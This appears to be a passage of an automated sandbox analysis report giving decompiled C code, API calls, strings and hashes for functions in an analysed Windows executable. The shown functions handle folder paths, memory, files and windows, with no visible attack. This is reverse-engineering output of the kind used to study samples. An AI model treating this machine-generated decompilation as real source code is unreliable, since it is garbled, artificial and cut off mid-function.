                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID:
                                                            • API String ID: 530164218-0
                                                            • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                            • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 35%
                                                            			E006AC477() {
				void* _t13;
				void* _t15;
				intOrPtr _t16;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t37;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t57;

				_t13 =  *0x6d68ac(0x6cd804, 0x8000, 0, _t56 - 4); // executed
				if(_t13 != 0) {
					_t15 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t56 - 4); // executed
					if(_t15 != 0) {
						if( *0x6d67dc == 0) {
							_t16 =  *0x6d6534; // 0x0
							E005C4EA4(_t16, _t56 - 0x38);
							E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t56 - 0x38))); // executed
						} else {
							_t24 =  *0x6d6538; // 0x0
							E005C4EA4(_t24, _t56 - 0x34);
							E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t56 - 0x34)));
						}
						E006AC180(); // executed
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(E006AC58D);
						return E0040A228(_t56 - 0x38, 0xd);
					} else {
						_push(_t56);
						_push(0x6ac516);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						E0040C8BC();
						_pop(_t53);
						 *[fs:eax] = _t53;
						_push(E006AC51D);
						_t32 =  *((intOrPtr*)(_t56 - 4));
						_push(_t32);
						L0043C214();
						return _t32;
					}
				} else {
					_push(_t56);
					_push(0x6ac4c3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					E0040C8BC();
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E006AC4CA);
					_t37 =  *((intOrPtr*)(_t56 - 4));
					_push(_t37);
					L0043C214();
					return _t37;
				}
			}














                                                            0x006ac487
                                                            0x006ac48f
                                                            0x006ac4da
                                                            0x006ac4e2
                                                            0x006ac524
                                                            0x006ac54a
                                                            0x006ac54f
                                                            0x006ac561
                                                            0x006ac526
                                                            0x006ac529
                                                            0x006ac52e
                                                            0x006ac540
                                                            0x006ac540
                                                            0x006ac566
                                                            0x006ac56d
                                                            0x006ac570
                                                            0x006ac573
                                                            0x006ac585
                                                            0x006ac4e4
                                                            0x006ac4e6
                                                            0x006ac4e7
                                                            0x006ac4ec
                                                            0x006ac4ef
                                                            0x006ac4fa
                                                            0x006ac501
                                                            0x006ac504
                                                            0x006ac507
                                                            0x006ac50c
                                                            0x006ac50f
                                                            0x006ac510
                                                            0x006ac515
                                                            0x006ac515
                                                            0x006ac491
                                                            0x006ac493
                                                            0x006ac494
                                                            0x006ac499
                                                            0x006ac49c
                                                            0x006ac4a7
                                                            0x006ac4ae
                                                            0x006ac4b1
                                                            0x006ac4b4
                                                            0x006ac4b9
                                                            0x006ac4bc
                                                            0x006ac4bd
                                                            0x006ac4c2
                                                            0x006ac4c2

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                            • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 47%
                                                            			E006AC4CA() {
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t36;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t43;

				_t10 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t42 - 4); // executed
				if(_t10 != 0) {
					if( *0x6d67dc == 0) {
						_t11 =  *0x6d6534; // 0x0
						E005C4EA4(_t11, _t42 - 0x38);
						E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t42 - 0x38))); // executed
					} else {
						_t19 =  *0x6d6538; // 0x0
						E005C4EA4(_t19, _t42 - 0x34);
						E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t42 - 0x34)));
					}
					E006AC180(); // executed
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E006AC58D);
					return E0040A228(_t42 - 0x38, 0xd);
				} else {
					_push(_t42);
					_push(0x6ac516);
					_push( *[fs:eax]);
					 *[fs:eax] = _t43;
					E0040C8BC();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(E006AC51D);
					_t27 =  *((intOrPtr*)(_t42 - 4));
					_push(_t27);
					L0043C214();
					return _t27;
				}
			}











                                                            0x006ac4da
                                                            0x006ac4e2
                                                            0x006ac524
                                                            0x006ac54a
                                                            0x006ac54f
                                                            0x006ac561
                                                            0x006ac526
                                                            0x006ac529
                                                            0x006ac52e
                                                            0x006ac540
                                                            0x006ac540
                                                            0x006ac566
                                                            0x006ac56d
                                                            0x006ac570
                                                            0x006ac573
                                                            0x006ac585
                                                            0x006ac4e4
                                                            0x006ac4e6
                                                            0x006ac4e7
                                                            0x006ac4ec
                                                            0x006ac4ef
                                                            0x006ac4fa
                                                            0x006ac501
                                                            0x006ac504
                                                            0x006ac507
                                                            0x006ac50c
                                                            0x006ac50f
                                                            0x006ac510
                                                            0x006ac515
                                                            0x006ac515

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                            • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004786AC(struct HWND__* __eax) {
				int _t3;
				struct HWND__* _t7;

				_t7 = __eax;
				_t6 = GetWindowLongW(__eax, 0xfffffffc);
				_t3 = DestroyWindow(_t7); // executed
				if(_t2 != L00414778) {
					return E004784F4(_t6);
				}
				return _t3;
			}





                                                            0x004786ae
                                                            0x004786b8
                                                            0x004786bb
                                                            0x004786c6
                                                            0x00000000
                                                            0x004786ca
                                                            0x004786d1

                                                            APIs
                                                            • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                            • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$DestroyLong
                                                            • String ID:
                                                            • API String ID: 2871862000-0
                                                            • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                            • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406DF0() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x006CFAE0;
				while(_t28 != 0x6cfadc) {
					_t2 = _t28 + 4; // 0x6cfadc
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x6c5084;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x6cfadc = 0x6cfadc;
				 *0x006CFAE0 = 0x6cfadc;
				_t26 = 0x400;
				_t23 = 0x6cfb7c;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x6cfb7c
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x6cfaf8 = 0;
				E00407760(0x6cfafc, 0x80);
				_t18 = 0;
				 *0x6cfaf4 = 0;
				_t31 =  *0x006D1B84;
				while(_t31 != 0x6d1b80) {
					_t10 = _t31 + 4; // 0x6d1b80
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x6d1b80 = 0x6d1b80;
				 *0x006D1B84 = 0x6d1b80;
				return _t18;
			}











                                                            0x00406dfe
                                                            0x00406e15
                                                            0x00406e03
                                                            0x00406e0e
                                                            0x00406e13
                                                            0x00406e13
                                                            0x00406e19
                                                            0x00406e1e
                                                            0x00406e23
                                                            0x00406e25
                                                            0x00406e2a
                                                            0x00406e2d
                                                            0x00406e36
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e41
                                                            0x00406e44
                                                            0x00406e49
                                                            0x00406e4e
                                                            0x00406e4e
                                                            0x00406e50
                                                            0x00406e52
                                                            0x00406e52
                                                            0x00406e55
                                                            0x00406e58
                                                            0x00406e58
                                                            0x00406e5d
                                                            0x00406e6e
                                                            0x00406e73
                                                            0x00406e75
                                                            0x00406e7a
                                                            0x00406e91
                                                            0x00406e7f
                                                            0x00406e8a
                                                            0x00406e8f
                                                            0x00406e8f
                                                            0x00406e95
                                                            0x00406e97
                                                            0x00406e9e

                                                            APIs
                                                            • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                            • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                            • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                            • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                            • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005C857C(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E0040A350(_t10, _t7, _t17, _t20);
			}








                                                            0x005c8583
                                                            0x005c859b
                                                            0x005c85a3
                                                            0x005c85a7
                                                            0x005c85b0
                                                            0x005c85a2
                                                            0x005c85a2
                                                            0x005c85a2
                                                            0x00000000
                                                            0x005c85b2
                                                            0x005c85b2
                                                            0x005c85b6
                                                            0x00000000
                                                            0x00000000
                                                            0x005c85b6
                                                            0x00000000
                                                            0x005c85b0
                                                            0x005c85c9

                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                            • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 31%
                                                            			E005C6808(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x5c684e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E005C567C(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E0040B278(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E005C6855);
				return E0040A1C8( &_v8);
			}






                                                            0x005c680b
                                                            0x005c6812
                                                            0x005c6813
                                                            0x005c6818
                                                            0x005c681b
                                                            0x005c6823
                                                            0x005c6831
                                                            0x005c683a
                                                            0x005c683d
                                                            0x005c6840
                                                            0x005c684d

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                            • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                            • Opcode Fuzzy Hash: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                            • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040D754(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040E9E0(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
